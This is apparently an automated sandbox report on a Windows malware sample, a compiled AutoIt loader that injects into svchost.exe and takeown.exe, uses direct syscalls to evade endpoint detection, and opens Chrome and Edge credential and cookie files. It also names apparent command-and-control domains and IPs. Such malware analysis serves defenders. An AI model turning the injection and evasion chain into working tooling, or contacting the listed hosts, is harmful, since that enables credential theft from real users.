                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037649D0 mov eax, dword ptr fs:[00000030h]1_2_037649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FA9D3 mov eax, dword ptr fs:[00000030h]1_2_037FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C69C0 mov eax, dword ptr fs:[00000030h]1_2_037C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804940 mov eax, dword ptr fs:[00000030h]1_2_03804940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B89B3 mov esi, dword ptr fs:[00000030h]1_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B89B3 mov eax, dword ptr fs:[00000030h]1_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037B89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037BE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037BE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037C6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037C6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03760854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03734859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03734859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03742840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03752835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038008C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0376A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037D483A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037D483A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037BC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0376C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0376C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037FA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0375E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037BC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03730887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_003680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0033A124 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0033A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtQueryVolumeInformationFile: Direct from: 0x776D2F2C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtQuerySystemInformation: Direct from: 0x776D48CC
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtAllocateVirtualMemory: Direct from: 0x776D48EC
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtOpenSection: Direct from: 0x776D2E0C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtDeviceIoControlFile: Direct from: 0x776D2AEC
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtAllocateVirtualMemory: Direct from: 0x776D2BEC
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtQueryInformationProcess: Direct from: 0x776D2C26
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtResumeThread: Direct from: 0x776D2FBC
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtWriteVirtualMemory: Direct from: 0x776D490C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtCreateUserProcess: Direct from: 0x776D371C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtClose: Direct from: 0x776D2B6C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtAllocateVirtualMemory: Direct from: 0x776D3C9C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtSetInformationThread: Direct from: 0x776C63F9
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtQueryAttributesFile: Direct from: 0x776D2E6C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtSetInformationThread: Direct from: 0x776D2B4C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtReadVirtualMemory: Direct from: 0x776D2E8C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtCreateKey: Direct from: 0x776D2C6C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtResumeThread: Direct from: 0x776D36AC
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtMapViewOfSection: Direct from: 0x776D2D1C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtWriteVirtualMemory: Direct from: 0x776D2E3C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtCreateMutant: Direct from: 0x776D35CC
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtAllocateVirtualMemory: Direct from: 0x776D2BFC
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtDelayExecution: Direct from: 0x776D2DDC
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtQuerySystemInformation: Direct from: 0x776D2DFC
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtReadFile: Direct from: 0x776D2ADC
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtTerminateThread: Direct from: 0x776D2FCC
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtQueryInformationToken: Direct from: 0x776D2CAC
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtCreateFile: Direct from: 0x776D2FEC
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtOpenFile: Direct from: 0x776D2DCC
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtOpenKeyEx: Direct from: 0x776D2B9C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtNotifyChangeKey: Direct from: 0x776D3C2C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtSetInformationProcess: Direct from: 0x776D2C5C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | NtProtectVirtualMemory: Direct from: 0x776D2F9C
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\takeown.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: NULL target: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe protection: read write
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: NULL target: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\takeown.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\takeown.exe | Thread register set: target process: 6020
                Source: C:\Windows\SysWOW64\takeown.exe | Thread APC queued: target process: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2D5A008
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_003687B1 LogonUserW
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_00313B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_003148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_00374C27 mouse_event
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\IBbGrGi4A7.exe"
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe | Process created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"
                Source: C:\Windows\SysWOW64\takeown.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_00367CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0036874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: IBbGrGi4A7.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000000.985481230.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329989125.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330559407.0000000000F70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                Source: IBbGrGi4A7.exe, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000000.985481230.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329989125.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330559407.0000000000F70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000000.985481230.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329989125.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330559407.0000000000F70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000000.985481230.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329989125.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330559407.0000000000F70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0033862B cpuid
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_00344E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_00351E06 GetUserNameW
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_00343F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_003149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000002.3330191796.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3330168283.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1066377922.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3328376409.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1066813135.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.3330359905.0000000004AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1066016609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3330036627.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\takeown.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: IBbGrGi4A7.exe | Binary or memory string: WIN_81
                Source: IBbGrGi4A7.exe | Binary or memory string: WIN_XP
                Source: IBbGrGi4A7.exe | Binary or memory string: WIN_XPe
                Source: IBbGrGi4A7.exe | Binary or memory string: WIN_VISTA
                Source: IBbGrGi4A7.exe | Binary or memory string: WIN_7
                Source: IBbGrGi4A7.exe | Binary or memory string: WIN_8
                Source: IBbGrGi4A7.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000002.3330191796.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3330168283.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1066377922.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3328376409.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1066813135.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.3330359905.0000000004AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1066016609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.3330036627.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_00386283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_00386747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                MITRE ATT&CK Matrix (one column per tactic; a number in front of a technique is the count the report attaches to it)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                Behavior Graph (graph image not preserved; node text recovered below)

                Behavior Graph ID: 1634593 | Sample: IBbGrGi4A7.exe | Startdate: 11/03/2025 | Architecture: WINDOWS | Score: 100

                Start node
                  DNS/IP: www.dolfisstillspinnin.xyz; www.sislieskort.xyz; 10 other IPs or domains
                  Signatures: Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 3 other signatures
                  Signature on www.sislieskort.xyz: Performs DNS queries to domains with low reputation

                IBbGrGi4A7.exe (2) started
                  Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces

                  svchost.exe started
                    Signatures: Maps a DLL or memory area into another process

                    L0o39BrLvRQHRGJJTVHX4K.exe injected
                      Signatures: Found direct / indirect Syscall (likely to bypass EDR)

                      takeown.exe (13) started
                        Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures

                        L0o39BrLvRQHRGJJTVHX4K.exe injected
                          DNS/IP: kakeksakti12.cfd 198.252.98.84, ports 49713, 49714, 49715, HAWKHOSTCA Canada; nan21.net 93.113.54.70, ports 49693, 49694, 49695, GTSCEGTSCentralEuropeAntelGermanyCZ Romania; 5 other IPs or domains
                          Signatures: Found direct / indirect Syscall (likely to bypass EDR)

                        firefox.exe started

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.